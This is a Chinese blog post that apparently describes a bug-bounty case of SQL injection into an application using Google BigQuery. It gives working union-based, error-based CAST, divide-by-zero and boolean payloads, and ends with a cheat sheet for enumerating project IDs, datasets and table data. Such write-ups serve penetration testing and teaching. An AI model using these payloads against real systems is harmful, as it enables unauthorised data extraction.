一个基于 BigQuery 的 SQL 注入挖掘案例

最新推荐文章于 2024-07-13 18:02:33 发布
最新推荐文章于 2024-07-13 18:02:33 发布
阅读量2.3k 收藏 24
点赞数 20
分类专栏: 网络安全 文章标签: sql 数据库 sql注入
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/136812115
版权

目录

前言

在通常的SQL注入中,我们面对的数据库为MySQL、MongoDB等等。针对不同的数据库,渗透的手法也有所差别。本文分享一个Synack.com上的特殊类SQL注入案例——【DBMS为BigQuery】

正文

Google有一个名为BigQuery的服务,我们可以通过它的云系统将其用作应用程序的数据库管理系统。尽管在大多数SQL结构方面它类似于其他数据库,但它的语法会有一些不同。

在正式开始案例前,先了解一下这个数据库。

在这个数据库中,存在两种查询机制,区别与联系如下:

1、标准模式:标准模式为目前的默认模式,大多数程序使用该模式

2、传统模式:传统模式为以前使用的旧模式,少数程序使用该模式

3、在查询开头加上 #legacySQL 和 #standardSQL 作为前缀,即可切换模式。

4、查询语法不一致

在传统SQL中,查询语法如下:

SELECT column-name FROM [project-name:dataset-name.table-name]

在标准SQL中则不同,查询语法如下:

SELECT column-name FROM `project-name:dataset-name.table-name`

5、由于BigQuery系统采用云技术,所以存在一个结构如下:

项目名称 -> 数据集(数据库)-> 表 -> 列 -> 数据

案例

添加单引号,返回语法错误,故存在报错注入:

img

也许你的想法和我一致,即启动SQLmap。

尽管SQLmap可以进行报错注入及布尔注入,但它不能很好地识别该DBMS。

那么该系统是什么?

仔细观察上图可知,From `` AS 这个字符串即可证明该DBMS为BigQuery。

现在要怎么注入?

BigQuery语法中不存在基于时间的函数如SLEEP、WAITFOR DELAY等,同时现有的报错注入Payload在此不通用。

由于该数据库支持union命令,那么就以其为切入点,通过不断利用报错回显后,设计出该Payload:

true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#

注入成功,回显如下:

img

那么下一步就是扩大攻击深度了:获取其它用户的项目名称,进而得到敏感数据。

可棘手的问题摆在眼前:

1、经测试,反引号字符(`)在应用程序后端被过滤或经过处理。

2、用户ID并非顺序排列,而是10位以上的数字,因此很难通过穷举攻击来获取用户ID。

3、INFORMATION_SCHEMA.SCHEMATA表无权访问

山穷水尽疑无路了?

通过不断尝试,我们最终发现了一个不需要`并且可以访问 INFORMATION_SCHEMA 表的数据:系统变量

设计出的Payload如下:

true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#

虽然得到的数据并不敏感,但足以证明它是一个有效的数据泄露POC。

当考虑获取敏感数据时,仅靠Union注入的列是无法起作用的,因为我们想要得到的是字符串,而我们注入的列只是一个整数值。

然而,在BigQuery中,类型转换问题可以引发语法错误:

dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#

通过使用CAST(@@project_id AS INT64),我们将@@project_id从默认的字符串类型转换为INT64整数类型,产生如下报错:

img

可以看到,回显中包含项目ID,至此,我们就能够获取数据库中的敏感数据。

涉及的语法、语句总结

1、注释:

select 1#from here it is not working

2、注释:

select 1/*between those it is not working*/

3、获取当前用户:

select session_user()

4、获取项目ID:

select @@project_id

5、获取所有数据集名称:

select schema_name from INFORMATION_SCHEMA.SCHEMATA

6、从特定项目ID和数据集获取数据:

select * from `project_id.dataset_name.table_name`

7、限制函数:

select schema_name from INFORMATION_SCHEMA.SCHEMATA limit 1

8、基于错误的类型转换:

select CAST(@@project_id AS INT64)

9、基于错误的除零操作:

' OR if(1/(length((select('a')))-1)=1,true,false) OR '

10、基于Union的注入:

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#

11、基于布尔值的注入:

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#

12、使用公共数据集的示例:

SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000

13、所有函数列表:

https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators

14、脚本语句:

https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting

参考链接:https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac

秋说
关注
  • 20
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
BigQuery:如何查询数据
weixin_42731853的博客
04-21 1751
在之前的BigQuery教程中,我们介绍了BigQuery体系结构,存储管理,以及将数据提取到BigQuery中。在本文中,我们将介绍使用SQLBigQuery中查询数据,保存和共享查询,创建视图和实例化视图。 标准SQL BigQuery支持两种SQL方言:标准SQL和旧式SQL。标准SQL是查询BigQuery中存储的数据的首选,因为它符合ANSI SQL 2011标准。与旧版SQL相比,它还有其他优点,例如JOIN操作的自动谓词下推以及对相关子查询的支持。有关更多信息,请参见标准SQL优点。 在Bi
bigquery使用教程_引入BigQuery ML以使用SQL构建预测模型
科技博客的分析“工具人”
07-08 2398
bigquery使用教程 大数据高效数据分析的一个关键是在数据所处的位置进行计算。 在某些情况下,这意味着在数据库(例如SQL Server)或大数据环境(例如Spark)中运行R,Python,Java或Scala程序。 但这需要一些相当技术上的编程和数据科学技能,这在业务分析师或SQL程序员中并不常见。 另外,如果您必须将数据集从数据仓库提取,转换和加载到另一个数据存储以进行机器学习,则会引...
10分钟教你掌握BigQuery语法
CLOUDACE的博客
08-10 5796
BigQuery(以下简称BQ)的CRUD操作都可以通过SQL指令來完成 Create: SQL INSERT statement Read: SQL SELETE statement Update : SQL UPDATE/MERGE, 虽然Bigquery支持update。但这毕竟是资料分析的 solution。建议还是不要经常做。 Delete: SQL DELETE 因为是资料分析的工具,因此用最多的就是"Read"的功能。现行BigQuery 支持SQL:2011的语法。 以下我们使用一個例子,
BigQuery 分区表简介和使用
nvd11的专栏
12-23 1724
我们先看定义:分区表是一种数据库表设计和管理技术,它将表中的数据划分为逻辑上的多个分区,每个分区包含一组特定的数据。每个分区都根据定义的分区键(通常是一个列或字段)的值进行分类,使得数据可以按照特定的逻辑规则进行划分和组织。通过使用分区表,可以将大型表分解为更小的、可管理的部分,以提高查询性能、数据维护效率和存储资源的利用率。分区表的实现方式和语法可能因数据库管理系统而异,但基本概念和原则是相似的。具体给个例子:当这个表的数据量增大时, 去查询这个表的性能会变慢。
bigquery_在BigQuery中链接多个SQL查询
weixin_26713521的博客
09-02 670
bigqueryBigquery is a fantastic tool! It lets you do really powerful analytics works all using SQL like syntax. Bigquery一个了不起的工具! 它使您能够使用像语法一样SQL来进行真正强大的分析工作。 But it lacks chaining the SQL queries. ...
Bigquery 多表查询
adinlead的博客
10-19 434
Firebase上报的数据会根据时间分到不同的表中,例如: my_project.analytics_20190307.events_20211015 my_project.analytics_20190307.events_20211016 my_project.analytics_20190307.events_20211017 my_project.analytics_20190307.events_20211018 如果要对这四个表进行跨表查询,则需要建立一个临时表即可: -- 查询活跃用
BigQuery:BigQuery SQL和Python代码
04-22
该存储库存储:SQL,Python,Shell,Spark和JavaScript(在SQL文件夹内)目录。 它们每个都包含我创建的用于执行各种数据分析任务的代码。 即使我在Google Cloud Platform的BigQuery中使用了它们,也可以找到一些...
vscode-bigquery一个用于运行BigQuery查询的Visual Studio Code插件
02-06
vscode-bigquery 一个Visual Studio代码(“ VS代码”)扩展,可以从您的编辑器查询Google Cloud Platform的,并将结果返回给您的编辑器。 通过此扩展程序,您可以: 用VS Code编写SQL并直接查询BigQuery数据集根据...
dekart:编写 BigQuery SQL 并获得基于 Kepler.gl 的美观、可共享的地图
07-24
Dekart 基于 Kepler.gl 可视化,支持 BigQuery 作为数据源。 特征 在 Kepler.gl 地图上可视化来自 BigQuery 的数据并与您的团队共享: 仅使用 SQL 的漂亮的大比例地图可视化 可视化多达 100 万行 保存地图并与您...
bq-events:BigQuery sql,用于查看事件
05-19
“bq-events”是一个与Google BigQuery相关的项目,主要目的是通过使用SQL查询来分析和查看各种事件数据。"BigQuery SQL"是Google大数据处理平台BigQuery所使用的查询语言,它允许用户对存储在BigQuery中的大规模...
logica:Logica是一种逻辑编程语言,可编译为StandardSQL并在Google BigQuery上运行
04-19
Logica可以编译为StandardSQL,并通过逻辑编程语法的便利性使您可以访问BigQuery引擎的功能。 这是有用的,因为BigQuery比现有的本机逻辑编程引擎更强大。 我们鼓励您尝试Logica,尤其是在以下情况下 您已经使用...
bigQuerybigQuery 的学习
qq_42200107的博客
07-13 456
bigQuery 详解
Google bigQuery 查询语句合集
丿灬安之若死
02-13 5416
普通查询SELECT event_dim.* FROM [表名] WHERE event_dim.name = 'battery1' and event_dim.params.value.string_value ='进入充电报告'普通查询3个参数SELECT event_dim.* FROM [表名] WHERE   event_dim.n...
Python 连接 Google BigQuery 进行SQL查询并下载数据
Mr.Feng的博客
12-15 4377
1.官方API文档 直接查看Google BigQuery的官方API文档:(需fan墙) https://googleapis.dev/python/bigquery/latest/index.html 该文档给出的例子很清楚 下面给出程序。 2.程序 先安装 BigQuery 的 Python 客户端 pip install google-cloud-bigquery 官方给出的例程: fr...
bigquery_到Google bigquerysql查询模板,它将您的报告提升到另一个层次
weixin_26705191的博客
08-20 618
bigqueryIn this post, we’re sharing report templates that you can build with SQL queries to Google BigQuery data. 在本文中,我们将分享您可以使用SQL查询为Google BigQuery数据构建的报告模板。 First, you’ll find out about what you ...
Google BigQuery带你走进大数据
热门推荐
白乔专栏
02-24 1万+
https://www.aliyun.com/zixun/content/2_11_16274.html在大数据时代,大数据这三个字被好多人经常挂在嘴边。但大于大部分普通人来说,对大数据真正的含义并不十分清晰,很多人仍处于懵懂的入门阶段。乍一看,大数据项目可能会有些吓人,尤其是如果包含了设置和管理Hadoop集群。如果你更习惯于SQL,而不是MapReduce,但是发现关系型数据库不符合分析需求。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专题一
最新发布
cao919的专栏Net
07-13 731
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 802
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL面试题-留存率计算
xiao4816的博客
07-07 450
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
google bigquery
09-06
Google BigQuery是谷歌提供的一种强大的大数据分析工具。它是一种完全托管的数据仓库解决方案,可用于存储和查询大规模的结构化和非结构化数据。 Google BigQuery具有许多优点。首先,它具有无服务器架构,无需管理任何基础设施,只需将数据上传到系统中即可。其次,它具有分布式数据处理能力,可以快速处理PB级别的数据量。此外,BigQuery还具有高度可扩展性,可以根据需要自动扩展以应对不断增长的工作负载。 使用Google BigQuery进行数据分析也非常简单。用户只需编写SQL查询语句,然后将其发送到BigQuery,即可对数据进行筛选、聚合、连接等操作。BigQuery还提供了强大的分析函数和工具,以使复杂的数据分析变得更加简单。 除此之外,Google BigQuery还具有数据安全和可靠性等方面的优势。它提供了强大的访问控制机制,可以确保只有授权用户能够访问和处理数据。此外,BigQuery还采用了冗余存储和自动备份等机制,以确保数据的安全性和可靠性。 总之,Google BigQuery是一种高效、易用和安全的大数据分析工具。它提供了强大的数据处理能力和灵活的查询工具,可帮助用户轻松地进行大规模数据分析,从而从海量数据中获取有价值的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值